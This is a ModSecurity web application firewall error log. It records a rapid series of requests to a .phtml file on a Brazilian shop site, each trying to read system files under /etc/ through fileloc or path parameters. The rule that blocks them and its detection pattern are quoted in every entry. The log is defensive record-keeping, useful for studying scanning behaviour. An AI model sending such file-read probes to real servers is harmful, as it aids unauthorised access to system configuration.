[Fri Mar 20 08:57:34.820503 2026] [:error] [pid 31215:tid 140411590858496] [client 57.141.18.24:59132] [client 57.141.18.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02LQF0L0L-SsrnPo5z-AAAAtI"]
[Fri Mar 20 08:57:34.822582 2026] [:error] [pid 10189:tid 140411658000128] [client 57.141.18.57:59140] [client 57.141.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02LjJ3M9BSuKP7CAYp9QAAAIo"]
[Fri Mar 20 08:57:34.824325 2026] [:error] [pid 7893:tid 140411708356352] [client 57.141.18.108:59136] [client 57.141.18.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02LhCii7xarUs8iHZyfwAAAgQ"]
[Fri Mar 20 08:57:34.927901 2026] [:error] [pid 10189:tid 140411666392832] [client 57.141.18.9:59156] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02LjJ3M9BSuKP7CAYp9gAAAIk"]
[Fri Mar 20 08:57:35.052828 2026] [:error] [pid 11167:tid 140411590858496] [client 57.141.18.21:59160] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02L_HIg5MgXLBnicMB_wAAAdI"]
[Fri Mar 20 08:57:35.459664 2026] [:error] [pid 26799:tid 140411725141760] [client 57.141.18.120:59174] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02L9a6ubjKNq_cu4bhFwAAA0I"]
[Fri Mar 20 08:57:35.642629 2026] [:error] [pid 7893:tid 140411674785536] [client 57.141.18.77:59180] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02LxCii7xarUs8iHZygAAAAgg"]
[Fri Mar 20 08:57:36.471321 2026] [:error] [pid 26799:tid 140411624429312] [client 57.141.18.10:59208] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02MNa6ubjKNq_cu4bhGAAAA04"]
[Fri Mar 20 08:57:36.721371 2026] [:error] [pid 7893:tid 140411565680384] [client 57.141.18.114:59130] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02MBCii7xarUs8iHZygwAAAhU"]
[Fri Mar 20 08:57:38.764098 2026] [:error] [pid 10189:tid 140411699963648] [client 57.141.18.53:59358] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02MjJ3M9BSuKP7CAYp-wAAAIU"]
[Fri Mar 20 08:57:39.520991 2026] [:error] [pid 10189:tid 140411632822016] [client 57.141.18.1:59418] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/asound.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02MzJ3M9BSuKP7CAYp_QAAAI0"]
[Fri Mar 20 08:57:39.839650 2026] [:error] [pid 9818:tid 140411683178240] [client 57.141.18.41:59440] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02M11pVZ5mVmJwsFM8ywAAAEc"]
[Fri Mar 20 08:57:41.720486 2026] [:error] [pid 9818:tid 140411674785536] [client 57.141.18.109:59576] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02NV1pVZ5mVmJwsFM8zgAAAEg"]
[Fri Mar 20 08:57:46.063014 2026] [:error] [pid 26799:tid 140411624429312] [client 57.141.18.38:59848] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02Ota6ubjKNq_cu4bhJQAAA04"]
[Fri Mar 20 08:57:46.464218 2026] [:error] [pid 10189:tid 140411716749056] [client 57.141.18.90:59860] [client 57.141.18.90] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02OjJ3M9BSuKP7CAYqCAAAAIM"]
[Fri Mar 20 08:57:48.412068 2026] [:error] [pid 9818:tid 140411616036608] [client 57.141.18.42:59906] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02O11pVZ5mVmJwsFM81AAAAE8"]
[Fri Mar 20 08:57:48.413902 2026] [:error] [pid 7893:tid 140411649607424] [client 57.141.18.22:59912] [client 57.141.18.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02PBCii7xarUs8iHZykAAAAgs"]
[Fri Mar 20 08:57:51.577952 2026] [:error] [pid 31215:tid 140411599251200] [client 57.141.18.64:60072] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02PgF0L0L-SsrnPo50BwAAAtE"]
[Fri Mar 20 08:57:51.608727 2026] [:error] [pid 10189:tid 140411733534464] [client 57.141.18.70:60070] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02PjJ3M9BSuKP7CAYqFwAAAIE"]
[Fri Mar 20 08:57:52.407149 2026] [:error] [pid 15826:tid 140411624429312] [client 57.141.18.27:60150] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02QOoXxyEfFpUF8f-LugAAAU4"]
[Fri Mar 20 08:57:53.466978 2026] [:error] [pid 10189:tid 140411725141760] [client 57.141.18.58:60196] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02QTJ3M9BSuKP7CAYqGAAAAII"]
[Fri Mar 20 08:57:55.026050 2026] [:error] [pid 7893:tid 140411607643904] [client 57.141.18.37:60248] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02QxCii7xarUs8iHZykwAAAhA"]
[Fri Mar 20 08:57:55.357453 2026] [:error] [pid 7235:tid 140411725141760] [client 57.141.18.94:60256] [client 57.141.18.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02Q_qxLDW4GITHUkT0mgAAAQI"]
[Fri Mar 20 08:57:56.029858 2026] [:error] [pid 15826:tid 140411548894976] [client 57.141.18.117:60268] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02ROoXxyEfFpUF8f-LuwAAAVc"]
[Fri Mar 20 08:57:58.528027 2026] [:error] [pid 7893:tid 140411540502272] [client 57.141.18.105:60354] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02RhCii7xarUs8iHZylwAAAhg"]
[Fri Mar 20 08:57:59.994930 2026] [:error] [pid 31215:tid 140411582465792] [client 57.141.18.115:60388] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02RwF0L0L-SsrnPo50DQAAAtM"]
[Fri Mar 20 08:57:59.998769 2026] [:error] [pid 26799:tid 140411699963648] [client 57.141.18.65:60386] [client 57.141.18.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02R9a6ubjKNq_cu4bhMwAAA0U"]
[Fri Mar 20 08:58:00.823347 2026] [:error] [pid 7893:tid 140411616036608] [client 57.141.18.2:60466] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02SBCii7xarUs8iHZymwAAAg8"]
[Fri Mar 20 08:58:01.175832 2026] [:error] [pid 31215:tid 140411699963648] [client 57.141.18.62:60482] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri 